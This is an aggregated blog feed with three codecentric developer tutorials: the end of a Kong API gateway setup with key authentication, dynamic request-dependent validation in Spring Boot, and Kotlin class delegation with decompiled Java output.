87eea678728f        kong:0.11.0         "/docker-entrypoin..."   Less than a second ago   Up 2 seconds (health: starting)   0.0.0.0:8000-8001->8000-8001/tcp, 0.0.0.0:8443-8444->8443-8444/tcp   kong
4e2bf871f0c7        postgres:9.4        "docker-entrypoint..."   3 hours ago              Up 4 minutes (healthy)            5432/tcp                                                             kong-database

Now check the status by sending a GET request to the admin API. I use the tool HTTPie for this, but you can run curl command or use Postman as an alternative.

$ http localhost:8001/apis/

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Connection: keep-alive
Content-Type: application/json; charset=utf-8
Date: Fri, 13 Oct 2017 14:59:25 GMT
Server: kong/0.11.0
Transfer-Encoding: chunked

{
    "data": [],
    "total": 0
}

The Kong admin API is working, but there are no APIs configured. Let’s add an example:

$ http post localhost:8001/apis/ name=example_api upstream_url=https://example.com uris=/my_api

HTTP/1.1 201 Created
Access-Control-Allow-Origin: *
Connection: keep-alive
Content-Type: application/json; charset=utf-8
Date: Fri, 13 Oct 2017 15:03:55 GMT
Server: kong/0.11.0
Transfer-Encoding: chunked

{
    "created_at": 1507907036000,
    "http_if_terminated": false,
    "https_only": false,
    "id": "59d9749b-694a-4645-adad-d2c974b3df76",
    "name": "example_api",
    "preserve_host": false,
    "retries": 5,
    "strip_uri": true,
    "upstream_connect_timeout": 60000,
    "upstream_read_timeout": 60000,
    "upstream_send_timeout": 60000,
    "upstream_url": "https://example.com",
    "uris": [
        "/my_api"
    ]
}

Simply make a POST request to localhost:8001/apis/ with three mandatory parameters in the http body:

  • name: the API name
  • upstream_url: the target URL that points to your API server
  • uris: URIs prefixes that point to your API

There are of course more parameters for ssl, timeouts, http methods, and others. You will find them in the documentation if you want to tinker with them. Now call the API:

$ http localhost:8000/my_api

HTTP/1.1 200 OK
Cache-Control: max-age=604800
Connection: keep-alive
Content-Encoding: gzip
Content-Length: 606
Content-Type: text/html; charset=UTF-8
Date: Tue, 17 Oct 2017 09:02:26 GMT
Etag: "359670651+gzip"
Expires: Tue, 24 Oct 2017 09:02:26 GMT
Last-Modified: Fri, 09 Aug 2013 23:54:35 GMT
Server: ECS (dca/249F)
Vary: Accept-Encoding
Via: kong/0.11.0
X-Cache: HIT
X-Kong-Proxy-Latency: 592
X-Kong-Upstream-Latency: 395




    Example Domain
...

In many cases you want to protect your API and give access only to dedicated users, so let’s see how Kong consumers and plugins work.

Consumers and Plugins

Consumers are objects that are (technical) users that consume an API. The data structure is rather simple with just three fields: id, username and custom_id. To create a consumer, send a POST request to localhost:8001/consumers/

$ http post localhost:8001/consumers/ username=John

HTTP/1.1 201 Created
Access-Control-Allow-Origin: *
Connection: keep-alive
Content-Type: application/json; charset=utf-8
Date: Tue, 17 Oct 2017 10:06:19 GMT
Server: kong/0.11.0
Transfer-Encoding: chunked

{
    "created_at": 1508234780000,
    "id": "bdbba9d1-5948-4e1a-94bd-55979b7117a3",
    "username": "John"
}

You have to provide either a username or a custom_id or both in the request body. Additionally you can set a custom_id for a mapping between a consumer and a user of your internal system, for example an ID in your CRM system. Use it to maintain consistency between Kong consumers and your source of truth for user data. I will now add a security plugin to my API and link the consumer to it. This will ensure that only this consumer can access the API with a specific key. A Kong plugin is a set of Lua modules that are executed during a request-response lifecycle of an API. You can add a plugin to all APIs, restrict it only for a specific API or a specific consumer. In my case I will add the key authentication plugin:

$ http post localhost:8001/apis/example_api/plugins name=key-auth

Access-Control-Allow-Origin: *
Connection: keep-alive
Content-Type: application/json; charset=utf-8
Date: Tue, 17 Oct 2017 11:59:16 GMT
Server: kong/0.11.0
Transfer-Encoding: chunked

{
    "api_id": "36d04e5d-436d-4132-abdc-e4d42dc67068",
    "config": {
        "anonymous": "",
        "hide_credentials": false,
        "key_in_body": false,
        "key_names": [
            "apikey"
        ]
    },
    "created_at": 1508241556000,
    "enabled": true,
    "id": "8eecbe27-af95-49d2-9a0a-5c71b9d5d9bd",
    "name": "key-auth"
}

The API name examlpe_api in the request URL restricts the plugin execution only to this API. Now if I try to use the API, the response will be:

$ http localhost:8000/my_api

HTTP/1.1 401 Unauthorized
Connection: keep-alive
Content-Type: application/json; charset=utf-8
Date: Tue, 17 Oct 2017 12:03:24 GMT
Server: kong/0.11.0
Transfer-Encoding: chunked
WWW-Authenticate: Key realm="kong"

{
    "message": "No API key found in request"
}

Now I need to create a key for my consumer:

$ http POST localhost:8001/consumers/John/key-auth key=secret_key

HTTP/1.1 201 Created
Access-Control-Allow-Origin: *
Connection: keep-alive
Content-Type: application/json; charset=utf-8
Date: Tue, 17 Oct 2017 12:35:11 GMT
Server: kong/0.11.0
Transfer-Encoding: chunked

{
    "consumer_id": "bdbba9d1-5948-4e1a-94bd-55979b7117a3",
    "created_at": 1508243712000,
    "id": "02d2afd6-1fb6-4713-860f-704c52355780",
    "key": "secret_key"
}

If you omit the key field, Kong will generate a random key for you. Now call the API with the created key:

$ http localhost:8000/my_api apikey=='secret_key'

HTTP/1.1 200 OK
Cache-Control: max-age=604800
Connection: keep-alive
Content-Encoding: gzip
Content-Length: 606
Content-Type: text/html; charset=UTF-8
Date: Tue, 17 Oct 2017 12:40:46 GMT
Etag: "359670651+gzip"
Expires: Tue, 24 Oct 2017 12:40:46 GMT
Last-Modified: Fri, 09 Aug 2013 23:54:35 GMT
Server: ECS (dca/249B)
Vary: Accept-Encoding
Via: kong/0.11.0
X-Cache: HIT
X-Kong-Proxy-Latency: 25
X-Kong-Upstream-Latency: 374




    Example Domain
...

Pass the apikey as a query parameter or as a header in your API call. The plugin also has configurations to hide the key after the request has been processed or to look it up in a list of keys. It is also possible to configure plugins on the consumer level, so each consumer will have their own settings. For example, you can create different rate limits for your consumers, so some of them can access your API more frequently than the others.

Summary

In this blogpost I’ve introduced the topic of APIs and why it could matter for your business. Kong API gateway is a great open-source project that can help you manage APIs for free. With just few http requests, we have created and secured our first API. The RESTful admin API of Kong is clean and simple, which allows for fast integration into most continuous delivery pipelines. In the upcoming blog post I will show you how to build your own plugin and use the OpenID provider to manage API access.

The post API management with Kong appeared first on codecentric AG Blog.

Categories: Agile, Java, TDD & BDD

Dynamic Validation with Spring Boot Validation

codecentric Blog - Wed, 22-Nov-17 01:30

Serverside validation is not only a way to prevent eventual attacks on a system, it also helps ensure data quality. In the Java environment JSR 303 Bean Validation and the javax.validation packages provide developers with a standardized way of doing so. Fields that have to fulfill certain criteria receive the corresponding annotations, e.g. @NotNull, and these are then evaluated by the framework. Naturally, for checking more specific conditions, there is the possibility of creating custom annotations and validators.

The Spring framework has a good Bean Validation integration. It is e.g. possible to validate an incoming request inside a RestController by adding the @Valid annotation to the request parameter. This ensures that the incoming object is validated. A simple example is the following controller:

@RestController
public class DataController {
    @RequestMapping(value = "/input", method = RequestMethod.POST)
    public ResponseEntity<?>; acceptInput(@Valid @RequestBody Data data ) {
        dataRepository.save(data);
        return new ResponseEntity<>(HttpStatus.OK);
    }
}

When entering the method, the very generic “Data” object has already been completely validated. If a field inside it wasn’t valid, the client would receive a 4xx status code.

Still, there is one disadvantage when using the validations: the annotations are completely static. It is not possible to read information e.g. from the request. Nevertheless, there are ways and means to overcome this limitation and enrich one’s own application with more dynamic validations. To be more specific, we want to extract one or more values from the incoming HttpRequest and vary the validation depending on the values.

More dynamic validation

Not so long ago, a joke went around regarding a famous social media platform’s charater limit. This picture provides a very nice summary.

Our example application shall be based on this use case. When our application receives a request that has the language de-DE set in its header, the text inside the JSON payload is allowed to be 280 characters long. For every other language we enforce a limit of 140 characters. In order to demonstrate the combination with static validation, the DTO contains a number field, which is being validated, too. More precisely, the object looks like this:

public class Data {
    @NotNull
    private final String someStringValue;
    @Min(1)
    private final int someIntValue;

    @JsonCreator
    public Data(@JsonProperty("someStringValue") String someStringValue, @JsonProperty("someIntValue") int someIntValue) {
        this.someStringValue = someStringValue;
        this.someIntValue = someIntValue;
    }

    public String getSomeStringValue() {
        return someStringValue;
    }

    public int getSomeIntValue() {
        return someIntValue;
    }
}

The JSON annotations come from Jackson and are already included in Spring Boot Starter Web, which is quite practical for our example. The someStringValue, which already has an annotation, shall be the field we use for checking the character limit.

For the validation we need a custom class containing the logic:

@Component
public class StringValueValidator {

    public void validate(String language, Data data, Errors errors) {
        if (!"de-DE".equals(language)) {
            if (data.getSomeStringValue().length() > 140) {
                errors.reject("someStringValue");
            }
        }
    }
}

I would like to emphasize here that the validator class does not implement any javax.validation interface, not even javax.xml.validation.Validator. This is because the validation depends on values from the request and is supposed to take place after the rest of the validation. Still, we want to utilize the existing checks (@NotNull und @Min). Except for the @Component annotation, the StringValueValidator is a POJO.

The Errors object originates from Spring and has the fully qualified name org.springframework.validation.Errors. As you can see, in case of a negative test result, we add the field that is being rejected to the Errors. It is also possible to add a more specific error message there.

Only using the @Valid annotation in the controller is not sufficient anymore. The existing errors are also needed as an additional parameter. By adding Errors to the parameter list, Spring recognizes that it should not reject the request immediately and pass the existing validation errors into the method. We have to be careful here because Spring will no longer send an automatic 4xx response in case of validation errors for us. We are now responsible ourselves to return the appropriate status code.

Next to the errors, we let Spring extract the language from the header. Of course, we could access the HttpRequest here but that way we save some effort. The language, the data, and the existing errors are then passed to our StringValueValidator. The complete request method looks like this:

    @RequestMapping(value = "/validation", method = RequestMethod.POST)
    public ResponseEntity<?> acceptData(@Valid @RequestBody Data data, Errors errors, 
        @RequestHeader(HttpHeaders.ACCEPT_LANGUAGE) String language) {
        stringValueValidator.validate(language, data, errors);
        if (errors.hasErrors()) {
            return new ResponseEntity<>(createErrorString(errors), HttpStatus.BAD_REQUEST);
        }
        return new ResponseEntity<>(HttpStatus.OK);
    }

We now have a dynamic validation, adapting its behaviour with respect to the request. The language shall only serve as an example placeholder for any value that could be inside the request. Alternatives could be the request URL or values inside the payload.

One of the curious things here is that one would expect to be able to make the validator a RequestScoped bean and then have it injected in the controller. Unfortunately, it was not possible for me to get this approach running. When testing with more than one request, the first one always got “stuck” inside the validator and the test then failed.

You can find the complete example project includung unit tests on GitHub: https://github.com/rbraeunlich/spring-boot-additional-validation

Conclusion

As shown, it is possible to extend the validation of fields with dynamic aspects in a quite simple way. We were even able to combine our extended validation with the existing one without experiencing any constraints. Especially complex validations that cannot be represented by pure annotations can easily be added to a RestController in this way.

The post Dynamic Validation with Spring Boot Validation appeared first on codecentric AG Blog.

Categories: Agile, Java, TDD & BDD

Elegant delegates in Kotlin

codecentric Blog - Wed, 15-Nov-17 01:11

Kotlin has given us some really killer features. Some are obviously useful (null safety), while others come with a warning, like operator overloading and extension functions. One such ‘handle-with-care’ feature is the language support for delegation. It’s easy to grasp, quick to apply and the manual literally takes half a page.

interface Base {
    fun print()
}

class BaseImpl(val x: Int) : Base {
    override fun print() { print(x) }
}

class Derived(b: Base) : Base by b

fun main(args: Array) {
    val b = BaseImpl(10)
    Derived(b).print() // prints 10
}

The delegate pattern dips its feet in the murky waters of inheritance: it aims to extend the functionality of a class by delegating the call to a helper object with which it shares an interface. This is all very comparable to an inheritance relationship.

Imagine we have a bunch of Rest controllers and want to have all incoming JSON objects pass through a String sanitiser (never mind that there are better AOP based solutions; you get my drift). We also want to do some extra authentication stuff.

Class EmployeeController @AutoWired 
                         constructor(sanitiser: StringSanitizerImpl, 
                                    authenticator: AuthenticatorImpl) : 
                                    StringSanitizer by sanitizer,
                                    Authenticator by authenticator

The good thing is that authenticator and sanitizer can be full-fledged Spring services, so the delegates can have their own @Autowired dependencies, something you could never achieve with plain inheritance, much less with Java’s default methods.

Great! Or is it? It is often said that you should favour composition over inheritance, and quite rightly so: inheritance shouldn’t be misused to pull in helper functionality from classes unless there is a clear IS-A relationship. A Book is a LibraryItem, but our EmployeeController is not really a StringSanitiser or an Authenticator. The only thing we have gained is not having to explicitly type the delegate references in the EmployeeController code — you could argue if that’s really a gain. But far worse is that we need to create interfaces just for the sake of delegation and that we expose the delegates’ API to the outside world, which is not what we want.

So: bad example.

You should use Kotlin delegation if you want to extend the behaviour of classes that you cannot or don’t want to subclass for a number of reasons:

  • They are final
  • You want to offer a limited or different API, using 98% of the existing code, basically an Adapter of Facade.
  • You want to hide the implementation from calling code, so they cannot cast to the superclass.

Suppose you have built a powerful library for creating Excel files that you want to use in various modules. Its API is quite extensive and low-level, i.e. not user-friendly. You also want to offer a pared-down version with fewer features and a simplified API. Subclassing won’t do: while you can override and add methods, the public API will only get larger. Here’s how you could handle it.

interface BasicExcelFacade {
  fun createCell(row: Int, column: Int): Cell
  /* imagine the interface has twenty more methods */
}

class FancyExcelLibrary() : BasicExcelFacade {
  fun createColor(color: Colors): Color {
  return Color(color)
}

override fun createCell(row: Int, column: Int): Cell = Cell(row, column)
}

class SimpleExcelLibrary(private val impl: FancyExcelLibrary) : BasicExcelFacade by impl {
  fun colorCellRed(row: Int, column: Int) {
  //createCell is automatically delegated to impl, like all the other twenty methods
  val cell = createCell(row, column)
  //createColor is not in the BasicExcelFacade, so we invoke the implementation directly
  cell.color = impl.createColor(Colors.RED)
  }
}

class Color(val colors: Colors)
class Cell(val row: Int, val col: Int, var color: Color)
enum class Colors {RED}

You create a BasicExcelFacade interface with all the FancyExcelLibrary methods you want to expose in the simple API (say 40%) and have FancyExcelLibrary implement it. You create a SimpleExcelLibrary class that takes a FancyExcelLibrary reference on construction and you only need to write code for the extra methods: no boilerplate needed.

There is another example where Kotlin delegates are really useful and that is Spring Crud Repositories. They’re great when working with JPA entities and ORM. You extend an interface, parameterising the Entity class and its primary key class (usually a Long or a String). This is all it takes.

interface EmployeeDao : CrudRepository<Employee, Long>

You can then autowire the EmployeeDAO into your code. The actual implementation is opaque and instantiated by the container: you cannot and should not subclass them, but sometimes it’d be darn useful to tweak its behaviour. For instance, I found myself writing code like the following in most of the services that use the generated DAOs.

fun findByIdStrict(id: Long) = employeeDao.findOne(id) ?: throw NotFoundException(“no Employee with id ${id}”)

All I wanted was to throw an exception when an entity can’t be found, and utilise Kotlin null safety in the return type of the findOne method, not having to handle ugly NullPointers

So we can’t subclass the generated DAO, but we can sure delegate to it.

@Service
class ActorRepository @Autowired constructor(val actorDao: ActorDao) : ActorDao by actorDao {
 fun removeById(id: Long) = delete(findById(id))
 fun findById(id: Long): Actor = findOne(id) ?: throw NotFoundException("No actor with id $id")
 override fun findByNameAndAccount(name: String, account: String): Actor = actorDao.findByNameAndAccount(name, account) ?: throw NotFoundException("Actor name unknown $name")
}

There is zero code duplication, an no boilerplate! This is actual code from my open source project kwinsie, by the way. Every wondered what it would look like in plain old Java? Just load the generated class file and decompile it. Just in case you’re wondering: the Actors are not Akka actors, but theatre actors, from my hobby project kwinsie.com.

That’s a heck of a lot of boilerplate you never have to see again… Happy Kotlin coding!

@NotNull
private final ActorDao actorDao;

public final void removeById(long id) {
this.delete(this.findById(id));
}

@NotNull
public final Actor findById(long id) {
Actor var10000 = this.findOne(id);
if (var10000 != null) {
return var10000;
} else {
throw (Throwable)(new NotFoundException("No actor with id " + id));
}
}

@NotNull
public Actor findByNameAndAccount(@NotNull String name, @NotNull String account) {
Intrinsics.checkParameterIsNotNull(name, "name");
Intrinsics.checkParameterIsNotNull(account, "account");
Actor var10000 = this.actorDao.findByNameAndAccount(name, account);
if (var10000 != null) {
return var10000;
} else {
throw (Throwable)(new NotFoundException("Actor name unknown " + name));
}
}

@NotNull
public final ActorDao getActorDao() {
return this.actorDao;
}

@Autowired
public ActorRepository(@NotNull ActorDao actorDao) {
Intrinsics.checkParameterIsNotNull(actorDao, "actorDao");
super();
this.actorDao = actorDao;
}

public long count() {
return this.actorDao.count();
}

public void delete(Long p0) {
this.actorDao.delete((Serializable)p0);
}

The post Elegant delegates in Kotlin appeared first on codecentric AG Blog.

Categories: Agile, Java, TDD & BDD

Thread Slivers eBook at Amazon

Syndicate content